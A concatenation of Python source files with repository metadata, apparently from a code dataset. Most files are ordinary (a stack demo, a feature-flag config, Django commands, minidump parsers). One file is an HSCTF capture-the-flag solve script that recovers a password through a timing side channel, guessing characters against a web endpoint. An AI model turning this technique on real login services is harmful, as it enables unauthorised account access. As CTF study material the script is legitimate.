        """Push the same item n times."""
        self.stack.extend([item] * n)

    def remove_one(self):
        """Pop the top item."""
        self.stack.pop()

    def remove_many(self, n):
        """Pop the top n items, one at a time."""
        for _ in range(n):
            self.stack.pop()

    def size(self):
        """Number of items currently on the stack."""
        return len(self.stack)

    def prettyprint(self):
        """Print the stack top-to-bottom, one boxed item per line."""
        for element in reversed(self.stack):
            print("|_", element, "_|")

    def add_list(self, L):
        """Push every element of L, preserving order."""
        self.stack.extend(L)

    def __str__(self):
        boxed = ["|_" + str(element) + "_|\n" for element in reversed(self.stack)]
        return "".join(boxed)
class Circle(object):
    """A circle characterized only by its radius (initially 0)."""

    def __init__(self):
        self.radius = 0

    def change_radius(self, radius):
        """Set the radius."""
        self.radius = radius

    def get_radius(self):
        """Return the current radius."""
        return self.radius

    def __str__(self):
        return "circle: {0}".format(self.radius)
# Demo: push two circles (radius 1 and 2) onto a stack and print it.
circles = Stack()
one_circle = Circle()
one_circle.change_radius(1)
circles.add_one(one_circle)
two_circle = Circle()
two_circle.change_radius(2)
circles.add_one(two_circle)
print(circles)
0cc75fc2057f1d904d4d63b853c8dc9ff11fc8ab | 987 | py | Python | featureflags/config.py | enverbisevac/ff-python-server-sdk | e7c809229d13517e0bf4b28fc0a556e693c9034e | [
"Apache-2.0"
] | null | null | null | featureflags/config.py | enverbisevac/ff-python-server-sdk | e7c809229d13517e0bf4b28fc0a556e693c9034e | [
"Apache-2.0"
] | null | null | null | featureflags/config.py | enverbisevac/ff-python-server-sdk | e7c809229d13517e0bf4b28fc0a556e693c9034e | [
"Apache-2.0"
] | null | null | null | """Configuration is a base class that has default values that you can change
during the instance of the client class"""
from typing import Callable
# Default feature-flag service endpoint (UAT environment).
BASE_URL = "https://config.feature-flags.uat.harness.io/api/1.0"
MINUTE = 60  # seconds per minute
PULL_INTERVAL = 1 * MINUTE  # default polling period, in seconds
class Config(object):
    """Feature-flags client configuration.

    Holds defaults that can be overridden either directly at construction
    time or via the with_* option functions defined in this module.
    """

    def __init__(self, base_url: str = BASE_URL,
                 pull_interval: int = PULL_INTERVAL,
                 cache: object = None,
                 store: object = None,
                 enable_stream: bool = False):
        self.base_url = base_url            # feature-flag service endpoint
        self.pull_interval = pull_interval  # polling period (seconds, per PULL_INTERVAL)
        self.cache = cache                  # optional cache backend — TODO confirm expected interface
        self.store = store                  # optional persistent store — TODO confirm expected interface
        self.enable_stream = enable_stream  # whether to enable streaming updates
# Shared module-level Config built entirely from defaults.
default_config = Config()
def with_base_url(base_url: str) -> Callable:
    """Return a functional option that installs *base_url* on a Config."""
    def func(config: Config) -> None:
        setattr(config, "base_url", base_url)
    return func
def with_stream_enabled(value: bool) -> Callable:
    """Return a functional option that toggles streaming on a Config."""
    def func(config: Config) -> None:
        setattr(config, "enable_stream", value)
    return func
| 25.973684 | 76 | 0.64843 | 130 | 987 | 4.723077 | 0.415385 | 0.102606 | 0.053746 | 0.068404 | 0.120521 | 0.120521 | 0.120521 | 0 | 0 | 0 | 0 | 0.006897 | 0.265451 | 987 | 37 | 77 | 26.675676 | 0.84 | 0.114488 | 0 | 0.166667 | 0 | 0 | 0.058756 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.208333 | false | 0 | 0.041667 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0cc7dbac1b53714dc8579ed543f77deb34610c57 | 1,705 | py | Python | src/users/management/commands/populate_tables.py | pimpale/BQuest-Backend | b32833ee5053db1c47fa28f57273632eae43a5cc | [
"MIT"
] | null | null | null | src/users/management/commands/populate_tables.py | pimpale/BQuest-Backend | b32833ee5053db1c47fa28f57273632eae43a5cc | [
"MIT"
] | 51 | 2018-01-24T05:53:15.000Z | 2022-01-13T00:44:24.000Z | src/users/management/commands/populate_tables.py | pimpale/BQuest-Backend | b32833ee5053db1c47fa28f57273632eae43a5cc | [
"MIT"
] | 3 | 2020-04-22T03:21:37.000Z | 2020-12-15T22:45:52.000Z | from django.core.management.base import BaseCommand
from users.models import Major, Minor, Course
from django.db import IntegrityError
from os import path
import json
class Command(BaseCommand):
    """Management command that seeds the Major, Minor and Course tables
    from the JSON name lists bundled with this app.

    Safe to re-run: rows whose names already exist are skipped.
    """

    def _load_names(self, filename):
        """Return the list of names in *filename*, resolved relative to the
        app directory (two levels above this module)."""
        base_path = path.dirname(__file__)
        json_path = path.abspath(path.join(base_path, "..", "..", filename))
        with open(json_path) as json_file:
            return json.load(json_file)

    def _populate(self, filename, model):
        """Insert one *model* row per name in *filename*, ignoring names
        that already exist (IntegrityError from the unique constraint)."""
        for name in self._load_names(filename):
            try:
                model(name=name).save()
            except IntegrityError:
                # duplicate name: already seeded on a previous run
                pass

    def _create_majors(self):
        self._populate("majors.json", Major)

    def _create_minors(self):
        self._populate("minors.json", Minor)

    def _create_courses(self):
        self._populate("courses.json", Course)

    def handle(self, *args, **kwargs):
        """Entry point: populate all three tables."""
        self._create_majors()
        self._create_minors()
        self._create_courses()
0ccb7361200b302e98746fb913273e875a9c713b | 593 | py | Python | 2019/06-hsctf/web-networked/solve.py | wani-hackase/wani-writeup | dd4ad0607d2f2193ad94c1ce65359294aa591681 | [
"MIT"
] | 25 | 2019-03-06T11:55:56.000Z | 2021-05-21T22:07:14.000Z | 2019/06-hsctf/web-networked/solve.py | wani-hackase/wani-writeup | dd4ad0607d2f2193ad94c1ce65359294aa591681 | [
"MIT"
] | 1 | 2020-06-25T07:27:15.000Z | 2020-06-25T07:27:15.000Z | 2019/06-hsctf/web-networked/solve.py | wani-hackase/wani-writeup | dd4ad0607d2f2193ad94c1ce65359294aa591681 | [
"MIT"
] | 1 | 2019-02-14T00:42:28.000Z | 2019-02-14T00:42:28.000Z | import requests
# Timing side-channel attack on the HSCTF "networked password" challenge:
# the server appears to compare the password prefix incrementally, so a
# correct next character produces a measurably longer response time.
text = "0123456789abcdefghijklmnopqrstuvwxyz_}"  # candidate alphabet (38 chars)
flag = "hsctf{"  # known flag prefix

for _ in range(30):  # recover up to 30 more characters
    # accumulated response time per candidate, seeded with a small epsilon
    time = [0.1 for _ in range(38)]
    for _ in range(5):  # 5 rounds per character to average out network jitter
        for i in range(38):
            payload = {"password": flag + text[i]}
            r = requests.post(
                "https://networked-password.web.chal.hsctf.com", data=payload
            )
            response_time = r.elapsed.total_seconds()
            time[i] += response_time
            print(payload, " response time : ", response_time)
    # the slowest candidate is most likely the next correct character
    flag += text[time.index(max(time))]
    print("flag is ", flag)
| 21.962963 | 77 | 0.563238 | 69 | 593 | 4.724638 | 0.492754 | 0.08589 | 0.092025 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046117 | 0.305228 | 593 | 26 | 78 | 22.807692 | 0.745146 | 0 | 0 | 0 | 0 | 0 | 0.205734 | 0.064081 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.125 | 0.0625 | 0 | 0.0625 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0ccc2e5ca0664e29a1337110f68367598882b29e | 3,936 | py | Python | azure-iot-device/azure/iot/device/iothub/models/message.py | elhorton/azure-iot-sdk-python | 484b804a64c245bd92930c13b970ff86f868b5fe | [
"MIT"
] | 1 | 2019-02-06T06:52:44.000Z | 2019-02-06T06:52:44.000Z | azure-iot-device/azure/iot/device/iothub/models/message.py | elhorton/azure-iot-sdk-python | 484b804a64c245bd92930c13b970ff86f868b5fe | [
"MIT"
] | null | null | null | azure-iot-device/azure/iot/device/iothub/models/message.py | elhorton/azure-iot-sdk-python | 484b804a64c245bd92930c13b970ff86f868b5fe | [
"MIT"
] | 1 | 2019-12-17T17:50:43.000Z | 2019-12-17T17:50:43.000Z | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""This module contains a class representing messages that are sent or received.
"""
from azure.iot.device import constant
# TODO: Revise this class. Does all of this REALLY need to be here?
class Message(object):
    """A message sent to or received from IoTHub.

    Carries the payload (``data``) together with the system and custom
    properties IoTHub understands: identifiers for request-reply patterns,
    timing, routing, feedback and content metadata.
    """

    def __init__(
        self,
        data,
        message_id=None,
        content_encoding="utf-8",
        content_type="application/json",
        output_name=None,
    ):
        """Create a message.

        :param data: the data that constitutes the payload
        :param str message_id: user-settable identifier used for
            request-reply patterns (case-sensitive ASCII, up to 128 chars)
        :param str content_encoding: encoding of the payload; default 'utf-8'
        :param str content_type: content type used to route messages with the
            message body; default 'application/json'
        :param str output_name: name of the output the message is sent to
        """
        # caller-supplied fields
        self.data = data
        self.message_id = message_id
        self.content_encoding = content_encoding
        self.content_type = content_type
        self.output_name = output_name
        # fields assigned by IoTHub / the receiver; unset until populated
        self.custom_properties = {}
        self.lock_token = None
        self.sequence_number = None
        self.to = None
        self.expiry_time_utc = None
        self.enqueued_time = None
        self.correlation_id = None
        self.user_id = None
        self.ack = None
        self._iothub_interface_id = None

    @property
    def iothub_interface_id(self):
        """Interface id marking special (e.g. security) messages, or None."""
        return self._iothub_interface_id

    def set_as_security_message(self):
        """Mark this message as a security message.

        This is a provisional API. Functionality not yet guaranteed.
        """
        self._iothub_interface_id = constant.SECURITY_MESSAGE_INTERFACE_ID

    def __str__(self):
        return str(self.data)
| 50.461538 | 298 | 0.649644 | 520 | 3,936 | 4.796154 | 0.301923 | 0.040096 | 0.027265 | 0.036087 | 0.262229 | 0.252606 | 0.252606 | 0.194868 | 0.157979 | 0.157979 | 0 | 0.00718 | 0.221545 | 3,936 | 77 | 299 | 51.116883 | 0.806789 | 0.690041 | 0 | 0 | 0 | 0 | 0.020038 | 0 | 0 | 0 | 0 | 0.012987 | 0 | 1 | 0.125 | false | 0 | 0.03125 | 0.0625 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0ccd4f9fbf2b5d4dda1cc40e475be33aa9ef28bc | 320 | py | Python | scraping/test001.py | flaviogf/Exemplos | fc666429f6e90c388e201fb7b7d5801e3c25bd25 | [
"MIT"
] | null | null | null | scraping/test001.py | flaviogf/Exemplos | fc666429f6e90c388e201fb7b7d5801e3c25bd25 | [
"MIT"
] | 5 | 2019-12-29T04:58:10.000Z | 2021-03-11T04:35:15.000Z | scraping/test001.py | flaviogf/Exemplos | fc666429f6e90c388e201fb7b7d5801e3c25bd25 | [
"MIT"
] | null | null | null | import pandas
import requests
with open('avengers.csv', 'w') as file:
file_url = 'https://raw.githubusercontent.com/fivethirtyeight/data/master/avengers/avengers.csv'
response = requests.get(file_url)
file.write(response.text)
with open('avengers.csv', 'r') as file:
data_frame = pandas.read_csv(file)
| 29.090909 | 100 | 0.73125 | 45 | 320 | 5.111111 | 0.555556 | 0.143478 | 0.13913 | 0.165217 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13125 | 320 | 10 | 101 | 32 | 0.827338 | 0 | 0 | 0 | 0 | 0 | 0.340625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0cdc773a241a8d2d5331293406b95caeb6731f44 | 926 | py | Python | tests/test_load_bin_log.py | bols-blue-org/pid_evaluation | af210f2ef7ca49681ff41f4531cfcbd83d70aca0 | [
"MIT"
] | 1 | 2020-08-27T06:30:53.000Z | 2020-08-27T06:30:53.000Z | tests/test_load_bin_log.py | bols-blue-org/ape | af210f2ef7ca49681ff41f4531cfcbd83d70aca0 | [
"MIT"
] | null | null | null | tests/test_load_bin_log.py | bols-blue-org/ape | af210f2ef7ca49681ff41f4531cfcbd83d70aca0 | [
"MIT"
] | null | null | null | import unittest
from ape.load_bin_log import LoadBinLog
class LoadBinTestCase(unittest.TestCase):
    """Exercises LoadBinLog parsing of ArduPilot .bin dataflash logs.

    These tests read real sample log files from ../tests/ relative to the
    working directory — they hit the filesystem, not a mock.
    """

    # sample log fixtures (paths were previously duplicated per test)
    LOG_A = "../tests/log_0_2020-5-1-14-53-42.bin"
    LOG_B = "../tests/log_13_2020-5-13-15-45-02.bin"

    def test_LoadBinLogAll(self):
        # no message-type filter: the log should yield at least one record
        data = LoadBinLog(self.LOG_A)
        self.assertGreater(len(data), 0, "no data")

    def test_LoadBinLogString(self):
        # a single message type passed as a plain string
        data = LoadBinLog(self.LOG_A, "RCOU")
        self.assertEqual(len(data), 822, "no data")

    def test_LoadBinLogStringArray(self):
        # multiple message types passed as a list
        data = LoadBinLog(self.LOG_A, ["RCOU", "ATT"])
        self.assertEqual(len(data), 1644, "no data")

    def test_SepalteRCIN6Para(self):
        # method name typo ("Sepalte") kept so existing test IDs stay stable
        data = LoadBinLog(self.LOG_B, ["RCOU", "ATT", "RCIN"])
        params = data.seplateRCIN6Param()  # renamed from `dict`, which shadowed the builtin
        for item in params:
            print("data" + item)
        self.assertEqual(len(data), 1644, "no data")
# Run the suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 31.931034 | 92 | 0.637149 | 126 | 926 | 4.507937 | 0.388889 | 0.049296 | 0.126761 | 0.161972 | 0.394366 | 0.348592 | 0.348592 | 0.235915 | 0.235915 | 0.235915 | 0 | 0.091521 | 0.197624 | 926 | 28 | 93 | 33.071429 | 0.672948 | 0 | 0 | 0.1 | 0 | 0 | 0.224622 | 0.157667 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | false | 0 | 0.1 | 0 | 0.35 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0ce7201689d9142cf85fb513dc2bf55a86b13523 | 475 | py | Python | car/migrations/0004_sale_cc.py | jobkarani/carnect | 8675d025e56fc07439b88e873e72a21cbbe747a9 | [
"MIT"
] | null | null | null | car/migrations/0004_sale_cc.py | jobkarani/carnect | 8675d025e56fc07439b88e873e72a21cbbe747a9 | [
"MIT"
] | null | null | null | car/migrations/0004_sale_cc.py | jobkarani/carnect | 8675d025e56fc07439b88e873e72a21cbbe747a9 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.9 on 2022-01-10 12:39
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Auto-generated migration: adds the `cc` column to the `sale` model."""

    dependencies = [
        ('car', '0003_auto_20220110_1507'),
    ]

    operations = [
        migrations.AddField(
            model_name='sale',
            name='cc',
            # NOTE(review): timezone.now as the default of a CharField looks like
            # the one-off default Django prompted for when adding a non-null
            # column — confirm existing rows ended up with sensible values.
            field=models.CharField(default=django.utils.timezone.now, max_length=100),
            preserve_default=False,
        ),
    ]
| 22.619048 | 86 | 0.621053 | 54 | 475 | 5.351852 | 0.777778 | 0.076125 | 0.131488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097701 | 0.267368 | 475 | 20 | 87 | 23.75 | 0.732759 | 0.094737 | 0 | 0 | 1 | 0 | 0.074766 | 0.053738 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0ce87ae6e8e21068ebe0de253baf4eb583ece22f | 701 | py | Python | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | import numpy as np
def convolucion(Ioriginal, kernel):
    """Sweep *kernel* over *Ioriginal* ("valid" mode, stride 1).

    Entrada:
        Ioriginal - original image as a 2-D matrix (list of lists or ndarray)
        kernel    - kernel to sweep over the image
    Salida:
        res - resulting ndarray of shape
              (rows(I) - rows(k) + 1, cols(I) - cols(k) + 1)

    Note: the kernel is applied as-is (not flipped), i.e. this computes
    cross-correlation — exactly what the original four nested loops did.
    """
    image = np.asarray(Ioriginal, dtype=float)
    k = np.asarray(kernel, dtype=float)
    kh, kw = k.shape
    # output dimensions: fr/cr in the original code
    out_rows = image.shape[0] - (kh - 1)
    out_cols = image.shape[1] - (kw - 1)
    res = np.zeros((out_rows, out_cols))
    for i in range(out_rows):
        for j in range(out_cols):
            # elementwise product of the kernel with the window at (i, j),
            # summed — replaces the two innermost Python loops
            res[i, j] = np.sum(k * image[i:i + kh, j:j + kw])
    return res
0ce945d91f14b7115bc5eeecc89a0cbddf6f0ae2 | 2,925 | py | Python | radical_translations/agents/tests/test_models.py | kingsdigitallab/radical_translations | c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a | [
"MIT"
] | 3 | 2022-02-08T18:03:44.000Z | 2022-03-18T18:10:43.000Z | radical_translations/agents/tests/test_models.py | kingsdigitallab/radical_translations | c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a | [
"MIT"
] | 19 | 2020-05-11T15:36:35.000Z | 2022-02-08T11:26:40.000Z | radical_translations/agents/tests/test_models.py | kingsdigitallab/radical_translations | c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a | [
"MIT"
] | null | null | null | from collections import defaultdict
import pytest
from radical_translations.agents.models import Organisation, Person
pytestmark = pytest.mark.django_db
@pytest.mark.usefixtures("vocabulary")
class TestOrganisation:
    """Tests for Organisation (and the shared agent_type property)."""

    def test_agent_type(self, title):
        # agent_type is derived from the concrete model class
        obj = Person(name="person name")
        obj.save()
        assert obj.agent_type == "person"

        obj = Organisation(name="organisation name")
        obj.save()
        assert obj.agent_type == "organisation"

    def test_from_gsx_entry(self):
        """from_gsx_entry builds an Organisation from a spreadsheet row."""
        # None input and an empty organisation name are both rejected
        assert Organisation.from_gsx_entry(None) is None

        entry = defaultdict(defaultdict)
        entry["gsx$organisation"]["$t"] = ""
        assert Organisation.from_gsx_entry(entry) is None

        # a non-empty name alone is sufficient
        entry["gsx$organisation"]["$t"] = "Organisation 1"
        assert Organisation.from_gsx_entry(entry) is not None

        entry["gsx$type"]["$t"] = "Publisher"
        assert Organisation.from_gsx_entry(entry) is not None

        entry["gsx$location"]["$t"] = "0001: London [UK]"
        assert Organisation.from_gsx_entry(entry) is not None

        # repeated imports of the same name must not create duplicate rows
        assert Organisation.objects.count() == 1
@pytest.mark.usefixtures("vocabulary")
class TestPerson:
    """Tests for Person.from_gsx_entry (spreadsheet-row import)."""

    def test_from_gsx_entry(self):
        # None input and an empty name are both rejected
        assert Person.from_gsx_entry(None) is None

        entry = defaultdict(defaultdict)
        entry["gsx$name"]["$t"] = ""
        assert Person.from_gsx_entry(entry) is None

        # a non-empty name alone is sufficient to create a Person
        entry["gsx$name"]["$t"] = "Person 1"
        assert Person.from_gsx_entry(entry) is not None

        entry["gsx$gender"]["$t"] = "f"
        p = Person.from_gsx_entry(entry)
        assert p is not None
        assert p.gender == "f"

        entry["gsx$birth"]["$t"] = "1790"
        p = Person.from_gsx_entry(entry)
        assert p is not None
        assert p.date_birth.date_display == "1790"

        # multiple residences are split on ';' — first/last preserve order
        entry["gsx$locationsresidence"]["$t"] = "0001: London [UK]; 0002: Paris [FR]"
        p = Person.from_gsx_entry(entry)
        assert p is not None
        assert "London" in p.based_near.first().address
        assert "Paris" in p.based_near.last().address

        entry["gsx$locationbirth"]["$t"] = "0001: London [UK]"
        p = Person.from_gsx_entry(entry)
        assert p is not None
        assert "London" in p.place_birth.address

        entry["gsx$locationdeath"]["$t"] = "0002: Paris [FR]"
        p = Person.from_gsx_entry(entry)
        assert p is not None
        assert "Paris" in p.place_death.address

        entry["gsx$occupations"]["$t"] = "tester"
        p = Person.from_gsx_entry(entry)
        assert p is not None
        assert "tester" in p.roles.first().label.lower()

        entry["gsx$organisations"]["$t"] = "Organisation 1"
        p = Person.from_gsx_entry(entry)
        assert p is not None

        entry["gsx$collaborators"]["$t"] = "Person 2; Person 3"
        p = Person.from_gsx_entry(entry)
        assert p is not None
        # Person 1 plus the two collaborators created by the last import
        assert Person.objects.count() == 3
0ceb7ee6367f4094900b7a7ad37575ea6ba9548d | 5,680 | py | Python | minidump/streams/MiscInfoStream.py | lucasg/minidump | 18474e3221038abe866256e4e0eb255e33615110 | [
"MIT"
] | 1 | 2021-06-13T10:00:44.000Z | 2021-06-13T10:00:44.000Z | minidump/streams/MiscInfoStream.py | lucasg/minidump | 18474e3221038abe866256e4e0eb255e33615110 | [
"MIT"
] | null | null | null | minidump/streams/MiscInfoStream.py | lucasg/minidump | 18474e3221038abe866256e4e0eb255e33615110 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#
# Author:
# Tamas Jos (@skelsec)
#
import io
import enum
#https://msdn.microsoft.com/en-us/library/windows/desktop/ms680388(v=vs.85).aspx
class MinidumpMiscInfo2Flags1(enum.IntFlag):
    """Validity flags for MINIDUMP_MISC_INFO_2.Flags1.

    Each flag marks which group of fields in the record actually holds data.
    https://msdn.microsoft.com/en-us/library/windows/desktop/ms680388(v=vs.85).aspx
    """
    MINIDUMP_MISC1_PROCESS_ID = 0x00000001  # ProcessId is used.
    MINIDUMP_MISC1_PROCESS_TIMES = 0x00000002  # ProcessCreateTime, ProcessKernelTime, and ProcessUserTime are used.
    MINIDUMP_MISC1_PROCESSOR_POWER_INFO = 0x00000004  # ProcessorMaxMhz, ProcessorCurrentMhz, ProcessorMhzLimit, ProcessorMaxIdleState, and ProcessorCurrentIdleState are used.
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms680389(v=vs.85).aspx
class MinidumpMiscInfoFlags1(enum.IntFlag):
    """Validity flags for MINIDUMP_MISC_INFO.Flags1 (v1 record).

    https://msdn.microsoft.com/en-us/library/windows/desktop/ms680389(v=vs.85).aspx
    """
    MINIDUMP_MISC1_PROCESS_ID = 0x00000001  # ProcessId is used.
    MINIDUMP_MISC1_PROCESS_TIMES = 0x00000002  # ProcessCreateTime, ProcessKernelTime, and ProcessUserTime are used.
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms680389(v=vs.85).aspx
class MINIDUMP_MISC_INFO:
    """Parsed MINIDUMP_MISC_INFO record (24-byte fixed layout).

    https://msdn.microsoft.com/en-us/library/windows/desktop/ms680389(v=vs.85).aspx
    """
    size = 24  # total size of the on-disk structure, in bytes

    def __init__(self):
        self.SizeOfInfo = None
        self.Flags1 = None
        self.ProcessId = None
        self.ProcessCreateTime = None
        self.ProcessUserTime = None
        self.ProcessKernelTime = None

    @staticmethod  # was an implicit plain function; only worked via class-level call
    def parse(buff):
        """Read one MINIDUMP_MISC_INFO record from the binary stream *buff*.

        Fields whose validity flag is absent are left as None, but their
        bytes are still consumed so the stream stays aligned.
        """
        def u32():
            # every field is an unsigned 32-bit little-endian integer
            return int.from_bytes(buff.read(4), byteorder='little', signed=False)

        mmi = MINIDUMP_MISC_INFO()
        mmi.SizeOfInfo = u32()
        mmi.Flags1 = MinidumpMiscInfoFlags1(u32())
        if mmi.Flags1 & MinidumpMiscInfoFlags1.MINIDUMP_MISC1_PROCESS_ID:
            mmi.ProcessId = u32()
        else:
            buff.read(4)  # skip the unused ProcessId slot
        if mmi.Flags1 & MinidumpMiscInfoFlags1.MINIDUMP_MISC1_PROCESS_TIMES:
            mmi.ProcessCreateTime = u32()
            mmi.ProcessUserTime = u32()
            mmi.ProcessKernelTime = u32()
        else:
            buff.read(12)  # skip the three unused time slots
        return mmi
#https://msdn.microsoft.com/en-us/library/windows/desktop/ms680388(v=vs.85).aspx
class MINIDUMP_MISC_INFO_2:
    """Parsed MINIDUMP_MISC_INFO_2 record (44-byte fixed layout).

    Extends the v1 record with processor power information.
    https://msdn.microsoft.com/en-us/library/windows/desktop/ms680388(v=vs.85).aspx
    """
    size = 44  # total size of the on-disk structure, in bytes

    def __init__(self):
        self.SizeOfInfo = None
        self.Flags1 = None
        self.ProcessId = None
        self.ProcessCreateTime = None
        self.ProcessUserTime = None
        self.ProcessKernelTime = None
        self.ProcessorMaxMhz = None
        self.ProcessorCurrentMhz = None
        self.ProcessorMhzLimit = None
        self.ProcessorMaxIdleState = None
        self.ProcessorCurrentIdleState = None

    @staticmethod  # was an implicit plain function; only worked via class-level call
    def parse(buff):
        """Read one MINIDUMP_MISC_INFO_2 record from the binary stream *buff*.

        Fields whose validity flag is absent are left as None, but their
        bytes are still consumed so the stream stays aligned.
        """
        def u32():
            # every field is an unsigned 32-bit little-endian integer
            return int.from_bytes(buff.read(4), byteorder='little', signed=False)

        mmi = MINIDUMP_MISC_INFO_2()
        mmi.SizeOfInfo = u32()
        mmi.Flags1 = MinidumpMiscInfo2Flags1(u32())
        if mmi.Flags1 & MinidumpMiscInfo2Flags1.MINIDUMP_MISC1_PROCESS_ID:
            mmi.ProcessId = u32()
        else:
            buff.read(4)  # skip the unused ProcessId slot
        if mmi.Flags1 & MinidumpMiscInfo2Flags1.MINIDUMP_MISC1_PROCESS_TIMES:
            mmi.ProcessCreateTime = u32()
            mmi.ProcessUserTime = u32()
            mmi.ProcessKernelTime = u32()
        else:
            buff.read(12)  # skip the three unused time slots
        if mmi.Flags1 & MinidumpMiscInfo2Flags1.MINIDUMP_MISC1_PROCESSOR_POWER_INFO:
            mmi.ProcessorMaxMhz = u32()
            mmi.ProcessorCurrentMhz = u32()
            mmi.ProcessorMhzLimit = u32()
            mmi.ProcessorMaxIdleState = u32()
            mmi.ProcessorCurrentIdleState = u32()
        else:
            buff.read(20)  # skip the five unused processor-power slots
        return mmi
class MinidumpMiscInfo:
    """Version-independent view of the minidump MiscInfo stream."""

    def __init__(self):
        # fields shared by both record versions
        self.ProcessId = None
        self.ProcessCreateTime = None
        self.ProcessUserTime = None
        self.ProcessKernelTime = None
        # processor power fields (present only in MINIDUMP_MISC_INFO_2)
        self.ProcessorMaxMhz = None
        self.ProcessorCurrentMhz = None
        self.ProcessorMhzLimit = None
        self.ProcessorMaxIdleState = None
        self.ProcessorCurrentIdleState = None

    @staticmethod  # was an implicit plain function; only worked via class-level call
    def parse(dir, buff):
        """Parse the MiscInfo stream located by directory entry *dir*.

        The record version is chosen by the recorded data size: exactly
        MINIDUMP_MISC_INFO.size bytes selects the v1 record, anything else is
        parsed as MINIDUMP_MISC_INFO_2.  (*dir* shadows the builtin, but the
        parameter name is kept for backward compatibility.)
        """
        t = MinidumpMiscInfo()
        buff.seek(dir.Location.Rva)
        chunk = io.BytesIO(buff.read(dir.Location.DataSize))
        if dir.Location.DataSize == MINIDUMP_MISC_INFO.size:
            misc = MINIDUMP_MISC_INFO.parse(chunk)
        else:
            misc = MINIDUMP_MISC_INFO_2.parse(chunk)
            # processor power data only exists in the v2 record
            t.ProcessorMaxMhz = misc.ProcessorMaxMhz
            t.ProcessorCurrentMhz = misc.ProcessorCurrentMhz
            t.ProcessorMhzLimit = misc.ProcessorMhzLimit
            t.ProcessorMaxIdleState = misc.ProcessorMaxIdleState
            t.ProcessorCurrentIdleState = misc.ProcessorCurrentIdleState
        # common fields (deduplicated from the original copy in each branch)
        t.ProcessId = misc.ProcessId
        t.ProcessCreateTime = misc.ProcessCreateTime
        t.ProcessUserTime = misc.ProcessUserTime
        t.ProcessKernelTime = misc.ProcessKernelTime
        return t

    def __str__(self):
        """Multi-line dump: header plus one 'Name value' line per field."""
        fields = (
            'ProcessId', 'ProcessCreateTime', 'ProcessUserTime',
            'ProcessKernelTime', 'ProcessorMaxMhz', 'ProcessorCurrentMhz',
            'ProcessorMhzLimit', 'ProcessorMaxIdleState',
            'ProcessorCurrentIdleState',
        )
        lines = ['== MinidumpMiscInfo ==']
        lines.extend('%s %s' % (name, getattr(self, name)) for name in fields)
        return '\n'.join(lines) + '\n'
0cec7a7b14ee446e6efc190805ad0c86fcf9567d | 2,565 | py | Python | test/python/transpiler/test_transpile.py | filemaster/qiskit-terra | 8672c407a5a0e34405315f82d5ad5847916e857e | [
"Apache-2.0"
] | null | null | null | test/python/transpiler/test_transpile.py | filemaster/qiskit-terra | 8672c407a5a0e34405315f82d5ad5847916e857e | [
"Apache-2.0"
] | null | null | null | test/python/transpiler/test_transpile.py | filemaster/qiskit-terra | 8672c407a5a0e34405315f82d5ad5847916e857e | [
"Apache-2.0"
